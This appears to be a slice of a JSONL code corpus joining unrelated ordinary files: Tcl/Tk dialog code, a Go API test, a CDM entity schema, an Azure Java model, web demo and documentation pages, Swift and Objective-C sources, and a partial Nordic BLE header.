}\n $w.default.value configure -text $desc -wraplength $wraplength\n\n# Port description.\n\n if [info exists LongDesc($modbase,$portName)] {\n\tset desc $LongDesc($modbase,$portName)\n } else {\n\tset desc $portDesc\n }\n set wraplength [expr [winfo width $w.desc.value] - 40]\n if {$wraplength < 100} {\n \tset wraplength 12c\n }\n $w.desc.value configure -text $desc -wraplength $wraplength\n return\n}\n\n#-------------------------------------------------------------------------------\n# GetPortValue -- retrieve correctly formatted value from port dialog entries.\n#\n# Args: instance\tInstance number of parameter list window.\n# Returns: value\tA port value in one of the following forms:\n#\t\t\t(a) pipe ?module port? (but NOT pipe ?id ...?)\n#\t\t\t(b) file ?filename?\n#\t\t\t(c) temp\n#-------------------------------------------------------------------------------\n\nproc tksu::GetPortValue instance {\n variable PortAction\n\n set w .param$instance.port\n set value $PortAction($instance)\n\n switch -- $value {\n \t\n\tpipe {\n\t set module [string trim [$w.pipe.module get]]\n\t set port [string trim [$w.pipe.port get]]\n\n\t if {$module != \"\" && $module != \"NONE\" && $port != \"\"} {\n\t\tset value \"pipe $module $port\"\n\t }\n\t}\n\tfile {\n\t set filename [string trim [$w.file.entry get]]\n\t set value \"file $filename\"\n\t}\n\ttemp {\n\t}\n }\n return $value\n}\n\n#-------------------------------------------------------------------------------\n# FormatPortValue -- return formatted port value.\n#\n# Args: rw\t\tI/O direction of port: `r', `w', or `rw'.\n#\t value\tPort value (see LoadPortDialog for format).\n# Returns: string\tA formatted string suitable for the parameter list.\n#-------------------------------------------------------------------------------\n\nproc tksu::FormatPortValue {rw value} {\n variable DevNull\n variable DevZero\n\n set action [lindex $value 0]\n set target [lindex $value 1]\n\n switch -- $action {\n \tpipe {\n\t if {$target == \"\" || $rw == \"rw\"} {\n\t \treturn \n\t }\n\n# Pipe value is a list of link ids:\n\n\t switch -- $rw {\n\t \tr {set direction w}\n\t\tw {set direction r}\n\t }\n\t if {[GetModPort $target $direction] != \"\"} {\n\t \tforeach id [lrange $value 1 end] {\n\t\t set modport [join [GetModPort $id $direction] :]\n\t\t if {$id != $target} {append str ,}\n\t\t append str $modport\n\t\t}\n\n# Pipe value is {module port}:\n\n\t } else {\n\t\tset str [join [lrange $value 1 2] :]\n\t }\n\t return $str\n\t}\n\n\tfile {\n\t return $target\n\t}\n\n\ttemp {\n\t switch -- $rw {\n\t \tr {return $DevZero}\n\t\tw {return $DevNull}\n\t\trw {return \"temp file\"}\n\t }\n\t}\n }\n return\n}\n\n#-------------------------------------------------------------------------------\n# LoadPortValue -- load given port value to dialog entries.\n#\n# Args: instance\tInstance number of parameter list window.\n#\t value\tA port value (see LoadPortDialog for details).\n# Returns: null\n#\n# Dialog widgets are filled and radiobuttons are set.\n#-------------------------------------------------------------------------------\n\nproc tksu::LoadPortValue {instance value} {\n variable CurrentParam\n variable CurrentModule\n variable PortAction\n\n set w .param$instance.port\n\n# If the focus is in one of the following widgets, change it to the new\n# active entry.\n\n set changeFocus 0\n foreach f \"$w.pipe.button $w.pipe.moduleB $w.pipe.portB $w.file.button \\\n \t $w.file.entry $w.temp.button $w.fileDialog\" {\n\tif {[focus] == $f} {\n\t set changeFocus 1\n\t}\n }\n set 
action [lindex $value 0]\n set target [lindex $value 1]\n set rw [lindex $CurrentParam($instance) 2]\n\n# If null, set action from default.\n\n if {$action == \"\"} {\n\tset action [lindex [NewValue port $CurrentParam($instance)] 3]\n\tset target \"\"\n }\n set PortAction($instance) $action\n\n $w.pipe.module configure -state normal\n $w.pipe.module delete 0 end\n $w.pipe.module configure -state disabled\n $w.pipe.moduleB configure -state disabled\n\n $w.pipe.port configure -state normal\n $w.pipe.port delete 0 end\n $w.pipe.port configure -state disabled\n $w.pipe.portB configure -state disabled\n\n $w.file.entry configure -state normal\n $w.file.entry delete 0 end\n $w.file.entry configure -state disabled\n $w.fileDialog configure -state disabled\n\n switch -- $action {\n pipe {\n\n# For preset parameter dialogs, disable the module and port entries.\n\n\t set module $CurrentModule($instance)\n\t if {$module == [ModBase $module]} {\n\t\tif $changeFocus {focus $w.pipe.button}\n\t\treturn\n\t }\n\n\t switch -- $rw {\n\t \tr {set direction w}\n\t\tw {set direction r}\n\t\trw {return}\n\t }\n\n# If a link is present, show the module and port of the link.\n\n\t set modport [GetModPort $target $direction]\n\t if {$modport != \"\"} {\n\t \tset module [lindex $modport 0]\n\t\tset port [lindex $modport 1]\n\t } else {\n\t \tset module [lindex $value 1]\n\t\tset port [lindex $value 2]\n\t }\n\t $w.pipe.moduleB configure -state normal\n\t $w.pipe.module configure -state normal\n\t $w.pipe.module insert 0 $module\n\t $w.pipe.module configure -state disabled\n\n\t $w.pipe.portB configure -state normal\n\t $w.pipe.port configure -state normal\n\t $w.pipe.port insert 0 $port\n\t $w.pipe.port configure -state disabled\n\n\t if $changeFocus {focus $w.pipe.moduleB}\n\t}\n\n\tfile {\n\t $w.fileDialog configure -state normal\n\t $w.file.entry configure -state normal\n\t $w.file.entry insert 0 $target\n\t if $changeFocus {focus $w.file.entry}\n\t}\n\n\ttemp {\n\t if $changeFocus {focus $w.temp.button}\n\t}\n }\n return\n}\n\n#-------------------------------------------------------------------------------\n# PipeModules -- select module from a modal list of modules.\n#\n# Args: instance\tInstance number for this dialog.\n# Returns: null\n#\n# ModalList is called to display current module instances in a listbox below\n# the module entry. When a selection is made and the listbox is withdrawn,\n# the module entry holds the new selection (but remains disabled).\n#\n# After selection, look for an existing link to the selected module. If\n# found, set the port entry to the connecting port. 
Otherwise set the\n# port entry blank.\n#-------------------------------------------------------------------------------\n\nproc tksu::PipeModules instance {\n variable CurrentParam\n variable CurrentValue\n variable Instances\n\n# Provide blank line at top of list for deleting a link.\n\n lappend modules {}\n eval lappend modules [lsort [array names Instances]]\n set w .param$instance.port.pipe\n\n ModalList $w.module $modules\n\n# If a link is present to the shown module, show the link's port.\n\n set rw [lindex $CurrentParam($instance) 2]\n switch -- $rw {\n \tr {set direction w}\n\tw {set direction r}\n }\n set module [string trim [$w.module get]]\n set port \"\"\n set value [lindex $CurrentValue($instance) 3]\n\n if {[lindex $value 0] == \"pipe\"} {\n\tforeach id [lrange $value 1 end] {\n\t set modport [GetModPort $id $direction]\n\n\t # Looking for a module name match ...\n\t if {$modport == \"\" || [lindex $modport 0] != $module} continue\n\n\t # Got one ...\n\t set port [lindex $modport 1]\n\t break\n\t}\n }\n\n# Load the port name.\n\n $w.port configure -state normal\n $w.port delete 0 end\n $w.port insert 0 $port\n $w.port configure -state disabled\n return\n}\n\n#-------------------------------------------------------------------------------\n# PipePorts -- select port from a modal list of ports.\n#\n# Args: instance\tInstance number for this dialog.\n# Returns: null\n#\n# ModalList is called to display current ports in a listbox below the port\n# entry. When a selection is made and the listbox is withdrawn, the port\n# entry holds the new selection (but remains disabled).\n#\n# The ports listed are those that belong to the module currently shown in\n# the module entry widget, and have the opposite I/O sense of the current\n# port in the dialog window. 
If no ports apply, the port list contains a\n# single blank entry.\n#-------------------------------------------------------------------------------\n\nproc tksu::PipePorts instance {\n variable CurrentParam\n variable Ports\n\n lappend ports {}\n set rw1 [lindex $CurrentParam($instance) 2]\n set w .param$instance.port.pipe\n set module [string trim [$w.module get]]\n\n if {$module != \"\"} {\n\tset modbase [ModBase $module]\n\tif [info exists Ports($modbase)] {\n\t foreach nlist $Ports($modbase) {\n\t\tset rw2 [lindex $nlist 2]\n\t\tif {$rw2 == \"rw\" || $rw2 == $rw1} continue\n\t\tlappend ports [lindex $nlist 0]\n\t }\n\t}\n }\n ModalList $w.port $ports\n return\n}\n\n#-------------------------------------------------------------------------------\n# PortToggle -- handler for port dialog radio buttons.\n#\n# Args: instance\tInstance number of parameter list window.\n# Returns: null\n#-------------------------------------------------------------------------------\n\nproc tksu::PortToggle instance {\n variable PortAction\n variable CurrentModule\n\n set w .param$instance.port\n set action $PortAction($instance)\n set module $CurrentModule($instance)\n\n set changeFocus 0\n foreach f \"$w.pipe.button $w.pipe.moduleB $w.pipe.portB $w.file.button \\\n \t $w.file.entry $w.temp.button $w.fileDialog\" {\n\tif {[focus] == $f} {set changeFocus 1}\n }\n $w.pipe.moduleB configure -state disabled\n $w.pipe.portB configure -state disabled\n $w.file.entry configure -state disabled\n $w.fileDialog configure -state disabled\n\n switch -- $action {\n pipe {\n\t if {$module == [ModBase $module]} {\n\t\tif $changeFocus {focus $w.pipe.button}\n\t } else {\n\t\t$w.pipe.moduleB configure -state normal\n\t\t$w.pipe.portB configure -state normal\n\t\tif $changeFocus {focus $w.pipe.moduleB}\n\t }\n\t}\n\tfile {\n\t $w.fileDialog configure -state normal\n\t $w.file.entry configure -state normal\n\t if $changeFocus {focus $w.file.entry}\n\t}\n\ttemp {\n\t if $changeFocus {focus $w.temp.button}\n\t}\n }\n return\n}\n\n#-------------------------------------------------------------------------------\n# PortFile -- raise dialog for selecting input or output file.\n#\n# Args: instance\tInstance number of parameter list window.\n# Returns: null\n#\n# If non-null filename is returned from dialog, it is stored in the file\n# entry widget.\n#-------------------------------------------------------------------------------\n\nproc tksu::PortFile instance {\n variable CurrentParam\n variable DataDir\n\n set w .param$instance.port.file.entry\n set rw [lindex $CurrentParam($instance) 2]\n\n if {$rw == \"r\"} {\n \tset filename [tk_getOpenFile -initialdir $DataDir]\n } else {\n \tset filename [tk_getSaveFile -initialdir $DataDir]\n }\n\n if {$filename != \"\"} {\n\tPushDialog $instance\n \t$w delete 0 end\n\t$w insert 0 $filename\n\tset DataDir [file dirname $filename]\n\tParamEnter $instance\n }\n return\n}\n"} {"text": "// Copyright 2014 tsuru authors. 
All rights reserved.\n// Use of this source code is governed by a BSD-style\n// license that can be found in the LICENSE file.\n\npackage api\n\nimport (\n\t\"encoding/json\"\n\t\"github.com/tsuru/tsuru/iaas\"\n\t\"launchpad.net/gocheck\"\n\t\"net/http\"\n\t\"net/http/httptest\"\n)\n\ntype TestIaaS struct{}\n\nfunc (TestIaaS) DeleteMachine(m *iaas.Machine) error {\n\tm.Status = \"destroyed\"\n\treturn nil\n}\n\nfunc (TestIaaS) CreateMachine(params map[string]string) (*iaas.Machine, error) {\n\tm := iaas.Machine{\n\t\tId: params[\"id\"],\n\t\tStatus: \"running\",\n\t\tAddress: params[\"id\"] + \".somewhere.com\",\n\t}\n\treturn &m, nil\n}\n\nfunc (s *S) TestMachinesList(c *gocheck.C) {\n\tiaas.RegisterIaasProvider(\"test-iaas\", TestIaaS{})\n\t_, err := iaas.CreateMachineForIaaS(\"test-iaas\", map[string]string{\"id\": \"myid1\"})\n\tdefer (&iaas.Machine{Id: \"myid1\"}).Destroy()\n\tc.Assert(err, gocheck.IsNil)\n\t_, err = iaas.CreateMachineForIaaS(\"test-iaas\", map[string]string{\"id\": \"myid2\"})\n\tdefer (&iaas.Machine{Id: \"myid2\"}).Destroy()\n\tc.Assert(err, gocheck.IsNil)\n\trecorder := httptest.NewRecorder()\n\trequest, err := http.NewRequest(\"GET\", \"/iaas/machines\", nil)\n\tc.Assert(err, gocheck.IsNil)\n\trequest.Header.Set(\"Authorization\", \"bearer \"+s.admintoken.GetValue())\n\tm := RunServer(true)\n\tm.ServeHTTP(recorder, request)\n\tc.Assert(recorder.Code, gocheck.Equals, http.StatusOK)\n\tvar machines []iaas.Machine\n\terr = json.NewDecoder(recorder.Body).Decode(&machines)\n\tc.Assert(err, gocheck.IsNil)\n\tc.Assert(machines[0].Id, gocheck.Equals, \"myid1\")\n\tc.Assert(machines[0].Address, gocheck.Equals, \"myid1.somewhere.com\")\n\tc.Assert(machines[0].CreationParams, gocheck.DeepEquals, map[string]string{\n\t\t\"id\": \"myid1\",\n\t})\n\tc.Assert(machines[1].Id, gocheck.Equals, \"myid2\")\n\tc.Assert(machines[1].Address, gocheck.Equals, \"myid2.somewhere.com\")\n\tc.Assert(machines[1].CreationParams, gocheck.DeepEquals, map[string]string{\n\t\t\"id\": \"myid2\",\n\t})\n}\n\nfunc (s *S) TestMachinesDestroy(c *gocheck.C) {\n\tiaas.RegisterIaasProvider(\"test-iaas\", TestIaaS{})\n\t_, err := iaas.CreateMachineForIaaS(\"test-iaas\", map[string]string{\"id\": \"myid1\"})\n\tc.Assert(err, gocheck.IsNil)\n\trecorder := httptest.NewRecorder()\n\trequest, err := http.NewRequest(\"DELETE\", \"/iaas/machines/myid1\", nil)\n\tc.Assert(err, gocheck.IsNil)\n\trequest.Header.Set(\"Authorization\", \"bearer \"+s.admintoken.GetValue())\n\tm := RunServer(true)\n\tm.ServeHTTP(recorder, request)\n\tc.Assert(recorder.Code, gocheck.Equals, http.StatusOK)\n}\n\nfunc (s *S) TestMachinesDestroyError(c *gocheck.C) {\n\trecorder := httptest.NewRecorder()\n\trequest, err := http.NewRequest(\"DELETE\", \"/iaas/machines/myid1\", nil)\n\tc.Assert(err, gocheck.IsNil)\n\trequest.Header.Set(\"Authorization\", \"bearer \"+s.admintoken.GetValue())\n\tm := RunServer(true)\n\tm.ServeHTTP(recorder, request)\n\tc.Assert(recorder.Code, gocheck.Equals, http.StatusNotFound)\n\tc.Assert(recorder.Body.String(), gocheck.Equals, \"machine not found\\n\")\n}\n"} {"text": "{\n \"jsonSchemaSemanticVersion\": \"1.0.0\",\n \"imports\": [\n {\n \"corpusPath\": \"cdm:/foundations.1.1.cdm.json\"\n },\n {\n \"corpusPath\": \"/core/operationsCommon/Common.1.0.cdm.json\",\n \"moniker\": \"base_Common\"\n },\n {\n \"corpusPath\": \"/core/operationsCommon/DataEntityView.1.0.cdm.json\",\n \"moniker\": \"base_DataEntityView\"\n },\n {\n \"corpusPath\": \"BudgetPlanScenario.1.0.cdm.json\"\n },\n {\n \"corpusPath\": 
\"/core/operationsCommon/Tables/System/SystemAdministration/Group/LanguageTable.1.0.cdm.json\"\n }\n ],\n \"definitions\": [\n {\n \"entityName\": \"BudgetPlanScenarioTranslation\",\n \"extendsEntity\": \"base_Common/Common\",\n \"exhibitsTraits\": [\n {\n \"traitReference\": \"is.CDM.entityVersion\",\n \"arguments\": [\n {\n \"name\": \"versionNumber\",\n \"value\": \"1.0\"\n }\n ]\n }\n ],\n \"hasAttributes\": [\n {\n \"name\": \"BudgetPlanScenario\",\n \"dataType\": \"BudgetPlanScenarioRecId\",\n \"description\": \"\"\n },\n {\n \"name\": \"Description\",\n \"dataType\": \"BudgetPlanScenarioDescription\",\n \"isNullable\": true,\n \"description\": \"\"\n },\n {\n \"name\": \"LanguageId\",\n \"dataType\": \"LanguageIdAll\",\n \"description\": \"\"\n },\n {\n \"name\": \"Name\",\n \"dataType\": \"BudgetPlanScenarioName\",\n \"description\": \"\"\n },\n {\n \"entity\": {\n \"entityReference\": \"BudgetPlanScenario\"\n },\n \"name\": \"Relationship_BudgetPlanScenarioRelationship\",\n \"resolutionGuidance\": {\n \"entityByReference\": {\n \"allowReference\": true\n }\n }\n },\n {\n \"entity\": {\n \"entityReference\": \"LanguageTable\"\n },\n \"name\": \"Relationship_LanguageTableRelationship\",\n \"resolutionGuidance\": {\n \"entityByReference\": {\n \"allowReference\": true\n }\n }\n }\n ],\n \"displayName\": \"Budget plan scenario translations\"\n },\n {\n \"dataTypeName\": \"BudgetPlanScenarioRecId\",\n \"extendsDataType\": \"bigInteger\"\n },\n {\n \"dataTypeName\": \"BudgetPlanScenarioDescription\",\n \"extendsDataType\": \"string\"\n },\n {\n \"dataTypeName\": \"LanguageIdAll\",\n \"extendsDataType\": \"string\"\n },\n {\n \"dataTypeName\": \"BudgetPlanScenarioName\",\n \"extendsDataType\": \"string\"\n }\n ]\n}"} {"text": "/**\n * Copyright (c) Microsoft Corporation. All rights reserved.\n * Licensed under the MIT License. See License.txt in the project root for\n * license information.\n *\n * Code generated by Microsoft (R) AutoRest Code Generator.\n */\n\npackage com.microsoft.azure.cognitiveservices.search.customsearch.models;\n\nimport com.fasterxml.jackson.annotation.JsonProperty;\n\n/**\n * Defines the error that occurred.\n */\npublic class Error {\n /**\n * The error code that identifies the category of error. Possible values\n * include: 'None', 'ServerError', 'InvalidRequest', 'RateLimitExceeded',\n * 'InvalidAuthorization', 'InsufficientAuthorization'.\n */\n @JsonProperty(value = \"code\", required = true)\n private ErrorCode code;\n\n /**\n * The error code that further helps to identify the error. 
Possible values\n * include: 'UnexpectedError', 'ResourceError', 'NotImplemented',\n * 'ParameterMissing', 'ParameterInvalidValue', 'HttpNotAllowed',\n * 'Blocked', 'AuthorizationMissing', 'AuthorizationRedundancy',\n * 'AuthorizationDisabled', 'AuthorizationExpired'.\n */\n @JsonProperty(value = \"subCode\", access = JsonProperty.Access.WRITE_ONLY)\n private ErrorSubCode subCode;\n\n /**\n * A description of the error.\n */\n @JsonProperty(value = \"message\", required = true)\n private String message;\n\n /**\n * A description that provides additional information about the error.\n */\n @JsonProperty(value = \"moreDetails\", access = JsonProperty.Access.WRITE_ONLY)\n private String moreDetails;\n\n /**\n * The parameter in the request that caused the error.\n */\n @JsonProperty(value = \"parameter\", access = JsonProperty.Access.WRITE_ONLY)\n private String parameter;\n\n /**\n * The parameter's value in the request that was not valid.\n */\n @JsonProperty(value = \"value\", access = JsonProperty.Access.WRITE_ONLY)\n private String value;\n\n /**\n * Get the code value.\n *\n * @return the code value\n */\n public ErrorCode code() {\n return this.code;\n }\n\n /**\n * Set the code value.\n *\n * @param code the code value to set\n * @return the Error object itself.\n */\n public Error withCode(ErrorCode code) {\n this.code = code;\n return this;\n }\n\n /**\n * Get the subCode value.\n *\n * @return the subCode value\n */\n public ErrorSubCode subCode() {\n return this.subCode;\n }\n\n /**\n * Get the message value.\n *\n * @return the message value\n */\n public String message() {\n return this.message;\n }\n\n /**\n * Set the message value.\n *\n * @param message the message value to set\n * @return the Error object itself.\n */\n public Error withMessage(String message) {\n this.message = message;\n return this;\n }\n\n /**\n * Get the moreDetails value.\n *\n * @return the moreDetails value\n */\n public String moreDetails() {\n return this.moreDetails;\n }\n\n /**\n * Get the parameter value.\n *\n * @return the parameter value\n */\n public String parameter() {\n return this.parameter;\n }\n\n /**\n * Get the value value.\n *\n * @return the value value\n */\n public String value() {\n return this.value;\n }\n\n}\n"} {"text": "\n\nCodeMirror: Turtle mode\n\n\n\n\n\n\n\n\n\n
Turtle mode

MIME types defined: text/turtle.
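The editor setup script that originally accompanied this demo page is not preserved here; the following is only a minimal sketch of how such a mode is typically attached to a textarea using the standard CodeMirror 5 API (the element id and extra options are illustrative assumptions, not taken from this page):

  // Attach a CodeMirror editor to a <textarea id="code"> and highlight its contents as Turtle,
  // selecting the mode via the MIME type listed above (assumed setup, not the page's original script).
  var editor = CodeMirror.fromTextArea(document.getElementById("code"), {
    mode: "text/turtle",
    lineNumbers: true
  });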
\n"} {"text": "#import \n#import \n#import \"AppDelegate.h\"\n\nint main(int argc, char* argv[]) {\n @autoreleasepool {\n return UIApplicationMain(argc, argv, nil, NSStringFromClass([AppDelegate class]));\n }\n}\n"} {"text": ".. _pages/widget/datefield#datefield:\n\nDateField\n*********\nA DateField widget can be used for date input. The input can be done in to kinds. The first kind is to chose a date from a date chose, which is a part of the DateField. The second kind is to write the date direct in the input field.\n.. _pages/widget/datefield#preview_image:\n\nPreview Image\n-------------\n\n|DateField|\n\n.. |DateField| image:: /pages/widget/datefield.png\n\n.. _pages/widget/datefield#features:\n\nFeatures\n--------\n* Pointer and keyboard support.\n* Custom date format.\n\n.. _pages/widget/datefield#description:\n\nDescription\n-----------\nA DateField has a ``qx.util.format.DateFormat`` which is used to format the date to a string. The formatted string is show in the input field. The input can be edit directly in the input filed or selecting a date with the data chooser. The date chooser can be pop up by tapping the calendar icon.\n\n.. _pages/widget/datefield#demos:\n\nDemos\n-----\nHere are some links that demonstrate the usage of the widget:\n\n* `DateField Demo `_\n* `Form demo `_\n\n.. _pages/widget/datefield#api:\n\nAPI\n---\n| Here is a link to the API of the Widget:\n| `qx.ui.form.DateField `_\n\n"} {"text": "//\n// ChartDefaultFillFormatter.swift\n// Charts\n//\n// Created by Daniel Cohen Gindi on 04/02/2016.\n//\n// Copyright 2015 Daniel Cohen Gindi & Philipp Jahoda\n// A port of MPAndroidChart for iOS\n// Licensed under Apache License 2.0\n//\n// https://github.com/danielgindi/ios-charts\n//\n\nimport Foundation\nimport CoreGraphics\n\n#if !os(OSX)\n import UIKit\n#endif\n\n/// Default formatter that calculates the position of the filled line.\npublic class ChartDefaultFillFormatter: NSObject, ChartFillFormatter\n{\n public override init()\n {\n }\n \n public func getFillLinePosition(dataSet dataSet: ILineChartDataSet, dataProvider: LineChartDataProvider) -> CGFloat\n {\n var fillMin = CGFloat(0.0)\n \n if (dataSet.yMax > 0.0 && dataSet.yMin < 0.0)\n {\n fillMin = 0.0\n }\n else\n {\n if let data = dataProvider.data\n {\n var max: Double, min: Double\n \n if (data.yMax > 0.0)\n {\n max = 0.0\n }\n else\n {\n max = dataProvider.chartYMax\n }\n \n if (data.yMin < 0.0)\n {\n min = 0.0\n }\n else\n {\n min = dataProvider.chartYMin\n }\n \n fillMin = CGFloat(dataSet.yMin >= 0.0 ? min : max)\n }\n }\n \n return fillMin\n }\n}\n"} {"text": "\n\n\n\n\n\norg.apache.sysds.runtime.controlprogram.paramserv Class Hierarchy (SystemDS 2.0.0-SNAPSHOT API)\n\n\n\n\n\n\n\n\n
Hierarchy For Package org.apache.sysds.runtime.controlprogram.paramserv

Class Hierarchy

• java.lang.Object
    • org.apache.sysds.runtime.controlprogram.paramserv.ParamServer
    • org.apache.sysds.runtime.controlprogram.paramserv.ParamservUtils
    • org.apache.sysds.runtime.controlprogram.paramserv.PSWorker (implements java.io.Serializable)
        • org.apache.sysds.runtime.controlprogram.paramserv.LocalPSWorker (implements java.util.concurrent.Callable<V>)
            • org.apache.sysds.runtime.controlprogram.paramserv.SparkPSWorker (implements org.apache.spark.api.java.function.VoidFunction<T>)
    • org.apache.sysds.runtime.controlprogram.paramserv.SparkPSBody

Copyright © 2020 The Apache Software Foundation. All rights reserved.
\n\n\n"} {"text": "/*\r\n * Copyright (c) Nordic Semiconductor ASA\r\n * All rights reserved.\r\n *\r\n * Redistribution and use in source and binary forms, with or without modification,\r\n * are permitted provided that the following conditions are met:\r\n *\r\n * 1. Redistributions of source code must retain the above copyright notice, this\r\n * list of conditions and the following disclaimer.\r\n *\r\n * 2. Redistributions in binary form must reproduce the above copyright notice, this\r\n * list of conditions and the following disclaimer in the documentation and/or\r\n * other materials provided with the distribution.\r\n *\r\n * 3. Neither the name of Nordic Semiconductor ASA nor the names of other\r\n * contributors to this software may be used to endorse or promote products\r\n * derived from this software without specific prior written permission.\r\n *\r\n * 4. This software must only be used in a processor manufactured by Nordic\r\n * Semiconductor ASA, or in a processor manufactured by a third party that\r\n * is used in combination with a processor manufactured by Nordic Semiconductor.\r\n *\r\n *\r\n * THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS \"AS IS\" AND\r\n * ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED\r\n * WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE\r\n * DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FOR\r\n * ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES\r\n * (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;\r\n * LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON\r\n * ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT\r\n * (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS\r\n * SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.\r\n *\r\n */\r\n\r\n/**\r\n @addtogroup BLE_GATTS Generic Attribute Profile (GATT) Server\r\n @{\r\n @brief Definitions and prototypes for the GATTS interface.\r\n */\r\n\r\n#ifndef BLE_GATTS_H__\r\n#define BLE_GATTS_H__\r\n\r\n#include \"ble_types.h\"\r\n#include \"ble_ranges.h\"\r\n#include \"ble_l2cap.h\"\r\n#include \"ble_gap.h\"\r\n#include \"ble_gatt.h\"\r\n#include \"nrf_svc.h\"\r\n\r\n/** @addtogroup BLE_GATTS_ENUMERATIONS Enumerations\r\n * @{ */\r\n\r\n/**\r\n * @brief GATTS API SVC numbers.\r\n */\r\nenum BLE_GATTS_SVCS\r\n{\r\n SD_BLE_GATTS_SERVICE_ADD = BLE_GATTS_SVC_BASE, /**< Add a service. */\r\n SD_BLE_GATTS_INCLUDE_ADD, /**< Add an included service. */\r\n SD_BLE_GATTS_CHARACTERISTIC_ADD, /**< Add a characteristic. */\r\n SD_BLE_GATTS_DESCRIPTOR_ADD, /**< Add a generic attribute. */\r\n SD_BLE_GATTS_VALUE_SET, /**< Set an attribute value. */\r\n SD_BLE_GATTS_VALUE_GET, /**< Get an attribute value. */\r\n SD_BLE_GATTS_HVX, /**< Handle Value Notification or Indication. */\r\n SD_BLE_GATTS_SERVICE_CHANGED, /**< Perform a Service Changed Indication to one or more peers. */\r\n SD_BLE_GATTS_RW_AUTHORIZE_REPLY, /**< Reply to an authorization request for a read or write operation on one or more attributes. */\r\n SD_BLE_GATTS_SYS_ATTR_SET, /**< Set the persistent system attributes for a connection. */\r\n SD_BLE_GATTS_SYS_ATTR_GET, /**< Retrieve the persistent system attributes. */\r\n};\r\n\r\n/**\r\n * @brief GATT Server Event IDs.\r\n */\r\nenum BLE_GATTS_EVTS\r\n{\r\n BLE_GATTS_EVT_WRITE = BLE_GATTS_EVT_BASE, /**< Write operation performed. 
@ref ble_gatts_evt_write_t */\r\n BLE_GATTS_EVT_RW_AUTHORIZE_REQUEST, /**< Read/Write Authorization request.@ref ble_gatts_evt_rw_authorize_request_t */\r\n BLE_GATTS_EVT_SYS_ATTR_MISSING, /**< A persistent system attribute access is pending, awaiting a sd_ble_gatts_sys_attr_set(). @ref ble_gatts_evt_sys_attr_missing_t */\r\n BLE_GATTS_EVT_HVC, /**< Handle Value Confirmation. @ref ble_gatts_evt_hvc_t */\r\n BLE_GATTS_EVT_SC_CONFIRM, /**< Service Changed Confirmation. No additional event structure applies. */\r\n BLE_GATTS_EVT_TIMEOUT /**< Timeout. @ref ble_gatts_evt_timeout_t */\r\n};\r\n/** @} */\r\n\r\n/** @addtogroup BLE_GATTS_DEFINES Defines\r\n * @{ */\r\n\r\n/** @defgroup BLE_ERRORS_GATTS SVC return values specific to GATTS\r\n * @{ */\r\n#define BLE_ERROR_GATTS_INVALID_ATTR_TYPE (NRF_GATTS_ERR_BASE + 0x000) /**< Invalid attribute type. */\r\n#define BLE_ERROR_GATTS_SYS_ATTR_MISSING (NRF_GATTS_ERR_BASE + 0x001) /**< System Attributes missing. */\r\n/** @} */\r\n\r\n/** @defgroup BLE_GATTS_ATTR_LENS_MAX Maximum attribute lengths\r\n * @{ */\r\n#define BLE_GATTS_FIX_ATTR_LEN_MAX (510) /**< Maximum length for fixed length Attribute Values. */\r\n#define BLE_GATTS_VAR_ATTR_LEN_MAX (512) /**< Maximum length for variable length Attribute Values. */\r\n/** @} */\r\n\r\n/** @defgroup BLE_GATTS_SRVC_TYPES GATT Server Service Types\r\n * @{ */\r\n#define BLE_GATTS_SRVC_TYPE_INVALID 0x00 /**< Invalid Service Type. */\r\n#define BLE_GATTS_SRVC_TYPE_PRIMARY 0x01 /**< Primary Service. */\r\n#define BLE_GATTS_SRVC_TYPE_SECONDARY 0x02 /**< Secondary Type. */\r\n/** @} */\r\n\r\n\r\n/** @defgroup BLE_GATTS_ATTR_TYPES GATT Server Attribute Types\r\n * @{ */\r\n#define BLE_GATTS_ATTR_TYPE_INVALID 0x00 /**< Invalid Attribute Type. */\r\n#define BLE_GATTS_ATTR_TYPE_PRIM_SRVC_DECL 0x01 /**< Primary Service Declaration. */\r\n#define BLE_GATTS_ATTR_TYPE_SEC_SRVC_DECL 0x02 /**< Secondary Service Declaration. */\r\n#define BLE_GATTS_ATTR_TYPE_INC_DECL 0x03 /**< Include Declaration. */\r\n#define BLE_GATTS_ATTR_TYPE_CHAR_DECL 0x04 /**< Characteristic Declaration. */\r\n#define BLE_GATTS_ATTR_TYPE_CHAR_VAL 0x05 /**< Characteristic Value. */\r\n#define BLE_GATTS_ATTR_TYPE_DESC 0x06 /**< Descriptor. */\r\n#define BLE_GATTS_ATTR_TYPE_OTHER 0x07 /**< Other, non-GATT specific type. */\r\n/** @} */\r\n\r\n\r\n/** @defgroup BLE_GATTS_OPS GATT Server Operations\r\n * @{ */\r\n#define BLE_GATTS_OP_INVALID 0x00 /**< Invalid Operation. */\r\n#define BLE_GATTS_OP_WRITE_REQ 0x01 /**< Write Request. */\r\n#define BLE_GATTS_OP_WRITE_CMD 0x02 /**< Write Command. */\r\n#define BLE_GATTS_OP_SIGN_WRITE_CMD 0x03 /**< Signed Write Command. */\r\n#define BLE_GATTS_OP_PREP_WRITE_REQ 0x04 /**< Prepare Write Request. */\r\n#define BLE_GATTS_OP_EXEC_WRITE_REQ_CANCEL 0x05 /**< Execute Write Request: Cancel all prepared writes. */\r\n#define BLE_GATTS_OP_EXEC_WRITE_REQ_NOW 0x06 /**< Execute Write Request: Immediately execute all prepared writes. */\r\n/** @} */\r\n\r\n/** @defgroup BLE_GATTS_VLOCS GATT Value Locations\r\n * @{ */\r\n#define BLE_GATTS_VLOC_INVALID 0x00 /**< Invalid Location. */\r\n#define BLE_GATTS_VLOC_STACK 0x01 /**< Attribute Value is located in stack memory, no user memory is required. */\r\n#define BLE_GATTS_VLOC_USER 0x02 /**< Attribute Value is located in user memory. This requires the user to maintain a valid buffer through the lifetime of the attribute, since the 